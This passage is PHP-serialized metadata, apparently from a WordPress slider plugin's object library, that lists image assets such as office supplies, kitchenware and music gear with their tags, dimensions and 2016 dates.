File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:6;a:12:{s:2:\"id\";s:3:\"169\";s:6:\"handle\";s:19:\"object_postit_2.png\";s:4:\"name\";s:18:\"Postit Label White\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:7;a:12:{s:2:\"id\";s:3:\"168\";s:6:\"handle\";s:21:\"object_envelope_2.png\";s:4:\"name\";s:13:\"Open Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:8;a:12:{s:2:\"id\";s:3:\"167\";s:6:\"handle\";s:17:\"object_eggs_1.png\";s:4:\"name\";s:10:\"Egg Carton\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:9;a:12:{s:2:\"id\";s:3:\"166\";s:6:\"handle\";s:25:\"object_bottleopener_1.png\";s:4:\"name\";s:13:\"Bottle Opener\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:10;a:12:{s:2:\"id\";s:3:\"165\";s:6:\"handle\";s:23:\"object_blueprints_1.png\";s:4:\"name\";s:10:\"Blueprints\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:11;a:12:{s:2:\"id\";s:3:\"164\";s:6:\"handle\";s:22:\"object_holepunch_1.png\";s:4:\"name\";s:10:\"Hole punch\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:12;a:12:{s:2:\"id\";s:3:\"163\";s:6:\"handle\";s:20:\"object_speaker_1.png\";s:4:\"name\";s:13:\"Black Speaker\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:13;a:12:{s:2:\"id\";s:3:\"162\";s:6:\"handle\";s:19:\"object_eraser_1.png\";s:4:\"name\";s:6:\"Eraser\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"500\";s:6:\"height\";s:3:\"500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:14;a:12:{s:2:\"id\";s:3:\"161\";s:6:\"handle\";s:23:\"object_vinylcover_1.png\";s:4:\"name\";s:11:\"Vinyl Cover\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:15;a:12:{s:2:\"id\";s:3:\"160\";s:6:\"handle\";s:20:\"object_booklet_1.png\";s:4:\"name\";s:9:\"Booklet 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:16;a:12:{s:2:\"id\";s:3:\"159\";s:6:\"handle\";s:22:\"object_earphones_2.png\";s:4:\"name\";s:11:\"Earphones 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:17;a:12:{s:2:\"id\";s:3:\"158\";s:6:\"handle\";s:18:\"object_vinyl_1.png\";s:4:\"name\";s:5:\"Vinyl\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:18;a:12:{s:2:\"id\";s:3:\"157\";s:6:\"handle\";s:19:\"object_postit_1.png\";s:4:\"name\";s:17:\"Postit Label Pink\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:19;a:12:{s:2:\"id\";s:3:\"156\";s:6:\"handle\";s:23:\"object_mechpencil_1.png\";s:4:\"name\";s:17:\"Mechanical Pencil\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:20;a:12:{s:2:\"id\";s:3:\"155\";s:6:\"handle\";s:22:\"object_turntable_1.png\";s:4:\"name\";s:9:\"Turntable\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:21;a:12:{s:2:\"id\";s:3:\"154\";s:6:\"handle\";s:19:\"object_folder_2.png\";s:4:\"name\";s:19:\"Closed Folder Black\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:22;a:12:{s:2:\"id\";s:3:\"153\";s:6:\"handle\";s:19:\"object_postit_4.png\";s:4:\"name\";s:18:\"Postit Label Green\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:23;a:12:{s:2:\"id\";s:3:\"152\";s:6:\"handle\";s:19:\"object_folder_1.png\";s:4:\"name\";s:12:\"Blank Folder\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:24;a:12:{s:2:\"id\";s:3:\"151\";s:6:\"handle\";s:19:\"object_pencup_1.png\";s:4:\"name\";s:7:\"Pen Cup\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:25;a:12:{s:2:\"id\";s:3:\"150\";s:6:\"handle\";s:23:\"object_winebottle_1.png\";s:4:\"name\";s:15:\"Red Wine Bottle\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:26;a:12:{s:2:\"id\";s:3:\"149\";s:6:\"handle\";s:23:\"object_headphones_1.png\";s:4:\"name\";s:10:\"Headphones\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:27;a:12:{s:2:\"id\";s:3:\"148\";s:6:\"handle\";s:22:\"object_earphones_1.png\";s:4:\"name\";s:9:\"Earphones\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:28;a:12:{s:2:\"id\";s:3:\"147\";s:6:\"handle\";s:19:\"object_postit_3.png\";s:4:\"name\";s:19:\"Postit Label Yellow\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:29;a:12:{s:2:\"id\";s:3:\"146\";s:6:\"handle\";s:22:\"object_corkscrew_1.png\";s:4:\"name\";s:23:\"Corkscrew Bottle Opener\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1300\";s:6:\"height\";s:4:\"1300\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:30;a:12:{s:2:\"id\";s:3:\"145\";s:6:\"handle\";s:19:\"object_muffin_1.png\";s:4:\"name\";s:16:\"Chocolate Muffin\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:31;a:12:{s:2:\"id\";s:3:\"144\";s:6:\"handle\";s:18:\"object_chair_2.png\";s:4:\"name\";s:12:\"Yellow Chair\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:32;a:12:{s:2:\"id\";s:3:\"143\";s:6:\"handle\";s:18:\"object_knife_2.png\";s:4:\"name\";s:7:\"Knife 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:33;a:12:{s:2:\"id\";s:3:\"142\";s:6:\"handle\";s:26:\"object_choppingboard_2.png\";s:4:\"name\";s:16:\"Chopping Board 3\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:34;a:12:{s:2:\"id\";s:3:\"141\";s:6:\"handle\";s:26:\"object_choppingboard_3.png\";s:4:\"name\";s:16:\"Chopping Board 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:35;a:12:{s:2:\"id\";s:3:\"140\";s:6:\"handle\";s:19:\"object_coffee_2.png\";s:4:\"name\";s:12:\"Coffee Cup 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:4:\"1200\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:36;a:12:{s:2:\"id\";s:3:\"139\";s:6:\"handle\";s:18:\"object_bread_1.png\";s:4:\"name\";s:15:\"Croissant Bread\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:37;a:12:{s:2:\"id\";s:3:\"138\";s:6:\"handle\";s:18:\"object_spoon_2.png\";s:4:\"name\";s:12:\"Wodden Spoon\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:38;a:12:{s:2:\"id\";s:3:\"137\";s:6:\"handle\";s:26:\"object_choppingboard_1.png\";s:4:\"name\";s:16:\"Chopping Board 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:39;a:12:{s:2:\"id\";s:3:\"136\";s:6:\"handle\";s:16:\"object_cup_2.png\";s:4:\"name\";s:11:\"Empty Cup 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:40;a:12:{s:2:\"id\";s:3:\"135\";s:6:\"handle\";s:18:\"object_knife_1.png\";s:4:\"name\";s:5:\"Knife\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:41;a:12:{s:2:\"id\";s:3:\"134\";s:6:\"handle\";s:18:\"object_spoon_1.png\";s:4:\"name\";s:5:\"Spoon\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:42;a:12:{s:2:\"id\";s:3:\"133\";s:6:\"handle\";s:16:\"object_cup_1.png\";s:4:\"name\";s:9:\"Empty Cup\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1400\";s:6:\"height\";s:4:\"1400\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:43;a:12:{s:2:\"id\";s:3:\"132\";s:6:\"handle\";s:18:\"object_chair_3.png\";s:4:\"name\";s:11:\"White Chair\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:44;a:12:{s:2:\"id\";s:3:\"131\";s:6:\"handle\";s:19:\"object_coffee_1.png\";s:4:\"name\";s:10:\"Coffee Cup\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:45;a:12:{s:2:\"id\";s:3:\"130\";s:6:\"handle\";s:19:\"object_frypan_2.png\";s:4:\"name\";s:9:\"Fry Pan 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:46;a:12:{s:2:\"id\";s:3:\"129\";s:6:\"handle\";s:19:\"object_frypan_1.png\";s:4:\"name\";s:9:\"Fry Pan 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:47;a:12:{s:2:\"id\";s:3:\"128\";s:6:\"handle\";s:17:\"object_fork_1.png\";s:4:\"name\";s:4:\"Fork\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:48;a:12:{s:2:\"id\";s:3:\"127\";s:6:\"handle\";s:20:\"object_dishrag_1.png\";s:4:\"name\";s:13:\"Dishrag Cloth\";s:4:\"tags\";a:0:{}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-17 13:48:44\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:49;a:12:{s:2:\"id\";s:3:\"126\";s:6:\"handle\";s:20:\"object_wacom_pen.png\";s:4:\"name\";s:17:\"Wacom Drawing Pen\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1060\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:50;a:12:{s:2:\"id\";s:3:\"125\";s:6:\"handle\";s:21:\"object_occulus_vr.png\";s:4:\"name\";s:23:\"Occulus Virtual Reality\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New 